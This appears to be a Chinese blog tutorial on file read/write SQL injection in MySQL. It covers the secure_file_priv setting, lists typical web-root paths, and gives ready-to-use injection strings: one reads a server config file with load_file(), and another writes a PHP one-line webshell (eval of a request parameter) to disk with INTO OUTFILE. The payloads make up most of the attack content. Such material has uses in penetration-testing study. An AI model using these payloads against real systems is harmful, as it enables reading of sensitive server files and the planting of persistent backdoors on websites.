SQL注入篇——文件读写注入
2023-09-11 14:17:07 时间
文件读写注入的原理
| 就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息 |
文件读写注入的条件
1、读写文件需要secure_file_priv权限
secure_file_priv=
代表对文件读写没有限制secure_file_priv=NULL
代表不能进行文件读写secure_file_priv=d:/phpstudy/mysql/data
代表只能对该路径下文件进行读写
2、知道网站绝对路径
Windows常见:
Phpstudy phpstudy/www
phpstudy/PHPTutorial/www
Xampp xampp/htdocs
Wamp wamp/www
Appser appser/www
Linux常见:
/var/mysql/data /var/www/html
读取文件
使用函数:load_file()
注入语句:
id=-1' union select 1,load_file('C:\\phpStudy\\PHPTutorial\\MySQL\\my.ini'),2 -- -
效果如图:
写入文件
使用函数:Into Outfile(能写入多行,按格式输出)和into Dumpfile(只能写入一行且没有输出格式)
注入语句:
1')) union select 1,'<?php eval($_REQUEST[23]); ?>',3 into outfile 'D://1.php' -- -
效果如图:
查看D:盘下是否出现1.php文件
相关文章
- 大叔经验分享(23)spark sql插入表时的文件个数研究
- python-操作csv文件
- init.rc文件中执行shell命令
- Springboot-@Value属性注入properties或yml文件
- python之文件转hex内容文件
- Sae 上传文件到Storage
- gunzip命令 unzip解压zip文件 unzip E-MTAB-8810.zip
- C#读取excel文件到datatable
- WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等
- CephFS文件存储系统
- SQL注入渗透与攻防(四)之文件读写